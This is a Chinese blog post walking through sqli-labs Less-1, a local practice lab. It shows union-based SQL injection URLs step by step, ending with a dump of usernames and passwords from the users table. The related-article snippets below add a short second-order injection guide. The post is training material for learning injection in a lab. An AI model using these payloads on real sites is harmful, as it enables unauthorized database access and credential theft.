sql注入第一关

最新推荐文章于 2024-06-16 09:38:31 发布
最新推荐文章于 2024-06-16 09:38:31 发布
阅读量379 收藏 8
点赞数 5
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62740725/article/details/136157244
版权

Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,目前是黑客对数据库进行攻击的最常用手段之一。

第一步

在id=1后加入一个闭合符号’,如果报错,再在后面加上 – qwe将后面注释掉,如果不报错,则证明为字符型。

http://127.0.0.1:8089/Less-1/?id=1' -- qwe

第二步 order by 查询字段个数

逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。

http://127.0.0.1:8089/Less-1/?id=1' order by 4 -- qwe

第三步 用select查询

用select查询前三个字段,目的是为了知道哪几个字段在前端显示,这样我们可以将想要查询的数据将前端显示的字段替换掉,比如这里我想查询数据库版本,就用version()替换掉了2。注意前面的id=1要改为id=-1,目的是为了让前面的查询语句不执行,这样我们后面查询的version()才能够显示出来。

http://127.0.0.1:8089/Less-1/?id=1'union select 1,2,3 -- qwe

http://127.0.0.1:8089/Less-1/?id=1'union select 1,version(),3 -- qwe

第四步 查询数据库

http://127.0.0.1:8089/Less-1/?id=1'union select 1,database(),3 -- qwe

第五步查询password和username

http://127.0.0.1:8089/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' -- qwe

第六步 username和password的具体数据

http://127.0.0.1:8089/Less-1/?id=1' and 1=2 union select 1,group_concat(username),group_concat(password) from users --+

武涛吴京
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入实验第一.docx
07-04
SQL注入实验,其中的实验数据库是基于MySQL数据库,针对常见的SQL注入语句的操作。
网络安全04-sql注入靶场第一
m0_68976043的博客
01-28 1946
sql注入环境,这个环境网上很多教程,其大部分基本都是小皮面板加漏洞环境放在WWW目录下,搜一下很容易就搭建出来了,这里就不详细讲述了,最后搭建下来的图片如图所示。
SQL注入sqli第一
weixin_69863399的博客
01-31 453
但是要注意前面的id就不能是1,而是要改为id=-1,这样做的目的是为了让前面的查询语句不执行,这样后面查询的version()才能显示出来。5、现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据库都会存储到users中,所以嘞我们现在需要查询users这个表中的所有字段是啥子。2、猜字段,使用order by查询字段个数,逐渐增加order by后面的数字,从1开始一直到报错为止,当order by到第四个字段时就报错了,所以说明有三个字段。
SQL注入练习.rar
06-25
sql-labs,该环境可以用来练习sql注入。是闯类型的一个靶场环境,从易到难,从简到繁。将每一都闯过的话,对于sql注入的理解会比较深入。
一卡通软件
03-11
其中第一组的为第一个中继编号,第二组为第二个中继编号,依此类推。设置时,例如现有一台无线收发器和一台无线一卡通终端设备,从收发器到一卡通终端设备必须经过一个编号为1的无线中继器,那么路由信息数字第一组...
网站安全网 v3.7.5.rar
07-17
Safe3WAF是国内第一款免费的Linux轻量级的反向代理Web安全网,采用类似nginx的占有内存少、高并发架构。作为网页服务器的前置,不但可以抵御各种黑客攻击,还可以高速内存cache服务器缓存相请求来提高Web服务器...
acunetix web vulnerability scanner
09-30
一款优秀的扫描器会使渗透更加轻松,但有些漏洞,"神器"也是扫不出来的,比如:逻辑漏洞、一些较隐蔽的XSS和SQL注入。所以,渗透的时候,神器一般都是需要人员来配合使用的。 Awvs(wvs)简介: AWVS是一个自动化的...
Flink Sql-用户自定义 Sources & Sinks
bigdatakenan的博客
06-13 903
在许多情况下,开发人员不需要从头开始创建新的连接器,而是希望稍微修改现有的连接器或 hook 到现有的 stack。在其他情况下,开发人员希望创建专门的连接器。本节对这两种用例都有帮助。它解释了表连接器的一般体系结构,从 API 中的纯粹声明到在集群上执行的运行时代码实心箭头展示了在转换过程中对象如何从一个阶段到下一个阶段转换为其他对象。
详解 Flink Table API 和 Flink SQL 之窗口操作
weixin_44480009的博客
06-13 271
时间语义,要配合窗口操作才能发挥作用。
Sqlite3入门和c/c++下使用
fg247778718的博客
06-13 643
1. 创建数据表格create table 表名(字段名 数据类型, 字段名 数据类型);2. 插入数据insert into 表名 values('字段数据','字段数据','字段数据','字段数据' );insert into student values('20200101', '张三', '广州','25648');insert into student values('20200102', '李四', '广州','25645');3. 查询数据(1) 查询。
数据持久层与 SQL 注入
A526847的博客
06-14 576
我们知道对抗 SQL 注入的最佳方式就是使用“预编译绑定变量”。在实际解决 SQL 注入时,还有一个难点就 是应用复杂后,代码数量庞大,难以把可能存在 SQL 注入的地方不遗漏地找出来,而 ORM 框 架为我们发现问题提供了一个便捷的途径。ibatis 支持动态 SQL,可以在 SQL 语句中插入动态变量:$value$,如果用户能够控制这 个变量,则会存在一个 SQL 注入的漏洞。当业务需要使用动态 SQL 时,可以作为特例处理,比如在上层的 代码逻辑中针对该变量进行严格的控制,以保证不会发生注入问题。
SQL Server中的FOR XML PATH以及Split
Jeakjava的博客
06-13 196
SQL Server中的FOR XML PATH以及Split
PostgreSQL的视图pg_roles
lee_vincent1的博客
06-10 685
pg_roles是 PostgreSQL 中的一个系统视图,提供了于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相的特性。通过查询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
springboot景区寄存管理系统(源码+sql+论文报告)
最新发布
u014445459的博客
06-16 630
传统的寄存方式简单易行,但只适合小规模行李寄存。当寄存行李数量较大时,要在众多的行李中寻找所需物件,光靠人工方式,难度增加,效率低下,还存在出错的风险。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了,但是Service服务的生存需要一个环境,这个环境便是Server,Server组件为Service服务的正常使用提供了生存环境,Server组件可以同时管理一个或多个Service服务。
NOSQL -- MOGODB
2303_79546217的博客
06-11 1049
是一个开源的, 高性能, 无模式的文档型数据库. NoSql数据库产品当中的一种, 也是最像系型数据库的非系型数据库。
【译】SQLAlchemy文档:SQLAlchemy 统一教程
一只大鸽子的博客
06-12 1171
**SQLAlchemy** 是 Python **SQL工具包**和**ORM**,它为应用程序开发人员提供了 SQL 的全部功能和灵活性。它提供了一整套企业级持久性模式,专为高效和高性能的数据库访问而设计。
Liquibase(Oracle SQLcl集成版)简明示例
In-Memory Computing Technology
06-14 349
本文使用的是Oracle SQLcl中集成的Liquibase,而非开源版Liquibase。Liquibase的快速入门可以参见。下面是典型的Liquibase工作流程,图来自Liquibase的文档参见。下面来看几个例子,使用的Schema是Oracle官方的Sample schema: HR。部署的目标Schema是HR2,位于同一个数据库中。
PostgreSQL的视图pg_tables
lee_vincent1的博客
06-10 591
是 PostgreSQL 中的一个系统视图,用于显示当前数据库中所有用户定义的表的信息。这个视图提供了于表的名称、所属模式(schema)、所有者以及表类型等详细信息。以下是一些常用的查询示例,可以帮助你获取和分析表的信息。 查看特定模式下的所有表 查看表的基本信息 查看特定表的信息 查看是否有索引的表 查看启用了行级安全策略的表 示例脚本 查看所有用户表的信息 查看有触发器的表 可以结合 和 视图查看哪些表有触发器。例如: 使用案例 获取所有表的完整信息 分析索引和触发器情况 通过
postgresql中geometry类型数据迁移
qq_43039260的博客
06-13 338
postgresql中geometry类型数据迁移
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点和攻击方式。 2. 找到注入点:在该卡中,你需要找到一个可以在 SQL 查询语句中注入恶意代码的输入点。尝试输入一些字符并观察是否有错误信息或异常行为,这可能是一个注入点的迹象。 3. 确认注入点:一旦找到潜在的注入点,你可以尝试输入一些特殊字符如单引号 ' 或双引号 " 来确认是否存在注入漏洞。如果应用程序返回错误信息或异常,那么很可能存在注入漏洞。 4. 利用注入:一旦确认存在注入漏洞,你可以通过构造恶意的输入来利用它。尝试使用 UNION SELECT 语句来获取额外的信息或执行其他操作。例如,你可以尝试 UNION SELECT NULL, table_name FROM information_schema.tables 来获取数据库中的表名。 5. 进一步探索:一旦成功利用注入漏洞,并且获得了足够的信息,你可以进一步探索数据库,执行其他命令或尝试绕过应用程序的安全措施。 请注意,在实际环境中进行 SQL 注入攻击是非法的,你应该仅限于在合法的演练平台上进行学习和测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值